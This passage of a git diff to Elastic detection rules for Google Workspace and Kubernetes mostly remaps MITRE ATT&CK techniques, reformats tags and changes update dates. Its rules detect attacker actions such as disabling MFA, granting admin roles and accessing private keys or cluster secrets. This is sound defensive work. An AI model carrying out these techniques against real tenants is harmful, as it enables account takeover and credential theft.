"Tactic: Credential Access", "Data Source: Google Workspace", "Use Case: Configuration Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Use Case: Configuration Audit", + "Tactic: Credential Access", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -96,31 +102,19 @@ file where event.dataset == "google_workspace.drive" and event.action : ("copy", [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1530" -name = "Data from Cloud Storage" -reference = "https://attack.mitre.org/techniques/T1530/" - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" - [[rule.threat.technique.subtechnique]] id = "T1552.004" name = "Private Keys" reference = "https://attack.mitre.org/techniques/T1552/004/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/integrations/google_workspace/defense_evasion_application_removed_from_blocklist_in_google_workspace.toml b/rules/integrations/google_workspace/defense_evasion_application_removed_from_blocklist_in_google_workspace.toml index 664b19c5d94..ba8f4a4f7f8 100644 --- a/rules/integrations/google_workspace/defense_evasion_application_removed_from_blocklist_in_google_workspace.toml +++ b/rules/integrations/google_workspace/defense_evasion_application_removed_from_blocklist_in_google_workspace.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/25" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/09/23" [rule] author = ["Elastic"] @@ -107,13 +107,19 @@ event.dataset:"google_workspace.admin" and event.category:"iam" and event.type:" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/google_workspace/defense_evasion_domain_added_to_google_workspace_trusted_domains.toml b/rules/integrations/google_workspace/defense_evasion_domain_added_to_google_workspace_trusted_domains.toml index fec6ad8c4e3..50b9fd776ed 100644 --- a/rules/integrations/google_workspace/defense_evasion_domain_added_to_google_workspace_trusted_domains.toml +++ b/rules/integrations/google_workspace/defense_evasion_domain_added_to_google_workspace_trusted_domains.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/09/23" [rule] author = ["Elastic"] @@ -99,13 +99,19 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/google_workspace/defense_evasion_restrictions_for_marketplace_modified_to_allow_any_app.toml b/rules/integrations/google_workspace/defense_evasion_restrictions_for_marketplace_modified_to_allow_any_app.toml index a0a8211ec53..09ecde61c16 100644 --- a/rules/integrations/google_workspace/defense_evasion_restrictions_for_marketplace_modified_to_allow_any_app.toml +++ b/rules/integrations/google_workspace/defense_evasion_restrictions_for_marketplace_modified_to_allow_any_app.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/25" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/09/23" [rule] author = ["Elastic"] @@ -108,13 +108,19 @@ event.dataset:"google_workspace.admin" and event.action:"CHANGE_APPLICATION_SETT [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml b/rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml index 04e49aa2abd..5c62a0f8be1 100644 --- a/rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml +++ b/rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/09/23" [rule] author = ["Elastic"] @@ -84,7 +84,13 @@ references = [ risk_score = 47 rule_id = "cad4500a-abd7-4ef3-b5d3-95524de7cfe1" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Credential Access", "Tactic: Defense Evasion", "Data Source: Google Workspace", "Use Case: Configuration Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Use Case: Configuration Audit", + "Tactic: Impact", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -97,36 +103,14 @@ event.dataset:google_workspace.admin and event.provider:admin [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" +id = "T1531" +name = "Account Access Removal" +reference = "https://attack.mitre.org/techniques/T1531/" -[[rule.threat.technique.subtechnique]] -id = "T1556.006" -name = "Multi-Factor Authentication" -reference = "https://attack.mitre.org/techniques/T1556/006/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - -[[rule.threat.technique.subtechnique]] -id = "T1556.006" -name = "Multi-Factor Authentication" -reference = "https://attack.mitre.org/techniques/T1556/006/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml b/rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml index 39173e2ad0e..9da5f09028e 100644 --- a/rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml +++ b/rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/16" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/09/23" [rule] author = ["Elastic"] @@ -86,7 +86,13 @@ references = [ risk_score = 47 rule_id = "38f384e0-aef8-11ed-9a38-f661ea17fbcc" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: Google Workspace", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -98,13 +104,19 @@ iam where event.dataset == "google_workspace.admin" and event.action == "ADD_GRO [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + + [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml b/rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml index 4c6bd7ab17f..e3a60da3cd3 100644 --- a/rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml +++ b/rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -77,7 +77,13 @@ references = [ risk_score = 21 rule_id = "00678712-b2df-11ed-afe9-f661ea17fbcc" severity = "low" -tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: Google Workspace", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -88,23 +94,19 @@ event.dataset:google_workspace.admin and event.category:iam and event.action:UNS [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" + [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml b/rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml index 7f270de664b..46a1d328e83 100644 --- a/rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml +++ b/rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/07" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/19" [rule] author = ["Elastic"] @@ -89,7 +89,12 @@ references = [ risk_score = 47 rule_id = "f33e68a4-bd19-11ed-b02f-f661ea17fbcc" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Execution", "Tactic: Persistence", "Data Source: Google Workspace", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Tactic: Initial Access", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -111,31 +116,19 @@ sequence by source.user.email with maxspan=3m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" [[rule.threat.technique.subtechnique]] -id = "T1204.001" -name = "Malicious Link" -reference = "https://attack.mitre.org/techniques/T1204/001/" +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/integrations/google_workspace/persistence_application_added_to_google_workspace_domain.toml b/rules/integrations/google_workspace/persistence_application_added_to_google_workspace_domain.toml index 3433348477a..90cf5ef9b6e 100644 --- a/rules/integrations/google_workspace/persistence_application_added_to_google_workspace_domain.toml +++ b/rules/integrations/google_workspace/persistence_application_added_to_google_workspace_domain.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/09/23" [rule] author = ["Elastic"] @@ -104,12 +104,8 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml b/rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml index 9dc67a9a58a..4647fb4aed4 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/26" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/09/23" [rule] author = ["Elastic"] @@ -86,7 +86,13 @@ references = [ risk_score = 47 rule_id = "5e161522-2545-11ed-ac47-f661ea17fbce" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Google Workspace", "Use Case: Configuration Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Use Case: Configuration Audit", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -97,36 +103,14 @@ event.dataset:"google_workspace.login" and event.action:"2sv_disable" [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - -[[rule.threat.technique.subtechnique]] -id = "T1556.006" -name = "Multi-Factor Authentication" -reference = "https://attack.mitre.org/techniques/T1556/006/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" -[[rule.threat.technique.subtechnique]] -id = "T1556.006" -name = "Multi-Factor Authentication" -reference = "https://attack.mitre.org/techniques/T1556/006/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/integrations/google_workspace/persistence_google_workspace_admin_role_assigned_to_user.toml b/rules/integrations/google_workspace/persistence_google_workspace_admin_role_assigned_to_user.toml index 1439fc968b1..a23661911b2 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_admin_role_assigned_to_user.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_admin_role_assigned_to_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/09/23" [rule] author = ["Elastic"] @@ -89,7 +89,13 @@ references = [ risk_score = 73 rule_id = "68994a6c-c7ba-4e82-b476-26a26877adf6" severity = "high" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Google Workspace", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Use Case: Identity and Access Audit", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -101,36 +107,19 @@ event.dataset:"google_workspace.admin" and event.category:"iam" and event.action [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/google_workspace/persistence_google_workspace_custom_admin_role_created.toml b/rules/integrations/google_workspace/persistence_google_workspace_custom_admin_role_created.toml index 5342d9390fe..643c9d27e06 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_custom_admin_role_created.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_custom_admin_role_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/09/23" [rule] author = ["Elastic"] @@ -87,7 +87,13 @@ references = [ risk_score = 47 rule_id = "ad3f2807-2b3e-47d7-b282-f84acbbe14be" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Google Workspace", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Persistence", +] timestamp_override = "event.ingested" type = "query" @@ -98,36 +104,14 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml b/rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml index c7acf7764c1..986aac4bd3d 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/09/23" [rule] author = ["Elastic"] @@ -85,7 +85,13 @@ references = [ risk_score = 47 rule_id = "a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: Google Workspace", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Use Case: Identity and Access Audit", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -105,13 +111,14 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/integrations/google_workspace/persistence_google_workspace_role_modified.toml b/rules/integrations/google_workspace/persistence_google_workspace_role_modified.toml index b71a1ab8f60..040e19fdd98 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_role_modified.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_role_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/09/23" [rule] author = ["Elastic"] @@ -89,7 +89,13 @@ references = [ risk_score = 47 rule_id = "6f435062-b7fc-4af9-acea-5b1ead65c5a5" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Google Workspace", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Persistence", +] timestamp_override = "event.ingested" type = "query" @@ -100,36 +106,14 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/google_workspace/persistence_google_workspace_user_organizational_unit_changed.toml b/rules/integrations/google_workspace/persistence_google_workspace_user_organizational_unit_changed.toml index 257ab1403ac..cb0bc8fec70 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_user_organizational_unit_changed.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_user_organizational_unit_changed.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/06" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/09/23" [rule] author = ["Elastic"] @@ -88,7 +88,13 @@ references = [ risk_score = 21 rule_id = "cc6a8a20-2df2-11ed-8378-f661ea17fbce" severity = "low" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Google Workspace", "Use Case: Configuration Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Use Case: Configuration Audit", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -100,36 +106,19 @@ event.dataset:"google_workspace.admin" and event.type:change and event.category: [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml b/rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml index 13b9f2a5eef..8bc3d051239 100644 --- a/rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml +++ b/rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/09/23" [rule] author = ["Elastic"] @@ -83,7 +83,13 @@ references = [ risk_score = 47 rule_id = "e555105c-ba6d-481f-82bb-9b633e7b4827" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Google Workspace", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Use Case: Identity and Access Audit", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -94,36 +100,14 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - -[[rule.threat.technique.subtechnique]] -id = "T1556.006" -name = "Multi-Factor Authentication" -reference = "https://attack.mitre.org/techniques/T1556/006/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" -[[rule.threat.technique.subtechnique]] -id = "T1556.006" -name = "Multi-Factor Authentication" -reference = "https://attack.mitre.org/techniques/T1556/006/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/integrations/kubernetes/credential_access_azure_arc_proxy_secret_configmap_access.toml b/rules/integrations/kubernetes/credential_access_azure_arc_proxy_secret_configmap_access.toml index e4be94a152b..0a6f1a1293f 100644 --- a/rules/integrations/kubernetes/credential_access_azure_arc_proxy_secret_configmap_access.toml +++ b/rules/integrations/kubernetes/credential_access_azure_arc_proxy_secret_configmap_access.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/10" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/10" [rule] author = ["Elastic"] @@ -70,7 +70,15 @@ references = [ risk_score = 47 rule_id = "220d92c6-479d-4a49-9cc0-3a29756dad0c" severity = "medium" -tags = ["Tactic: Credential Access", "Tactic: Impact", "Data Source: Kubernetes", "Domain: Kubernetes", "Domain: Cloud", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Kubernetes", + "Domain: Kubernetes", + "Domain: Cloud", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Collection", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -103,36 +111,31 @@ FROM logs-kubernetes.audit_logs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" - [[rule.threat.technique.subtechnique]] id = "T1552.007" name = "Container API" reference = "https://attack.mitre.org/techniques/T1552/007/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1565" -name = "Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/" +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" -[[rule.threat.technique.subtechnique]] -id = "T1565.001" -name = "Stored Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/001/" [rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + diff --git a/rules/integrations/kubernetes/defense_evasion_events_deleted.toml b/rules/integrations/kubernetes/defense_evasion_events_deleted.toml index cf03e321426..106c1158e52 100644 --- a/rules/integrations/kubernetes/defense_evasion_events_deleted.toml +++ b/rules/integrations/kubernetes/defense_evasion_events_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/27" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/19" [rule] author = ["Elastic"] @@ -74,6 +74,11 @@ id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" +[[rule.threat.technique.subtechnique]] +id = "T1070.004" +name = "File Deletion" +reference = "https://attack.mitre.org/techniques/T1070/004/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/integrations/kubernetes/discovery_denied_service_account_request.toml b/rules/integrations/kubernetes/discovery_denied_service_account_request.toml index 6226a49b4c1..7e2e716541f 100644 --- a/rules/integrations/kubernetes/discovery_denied_service_account_request.toml +++ b/rules/integrations/kubernetes/discovery_denied_service_account_request.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/13" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" 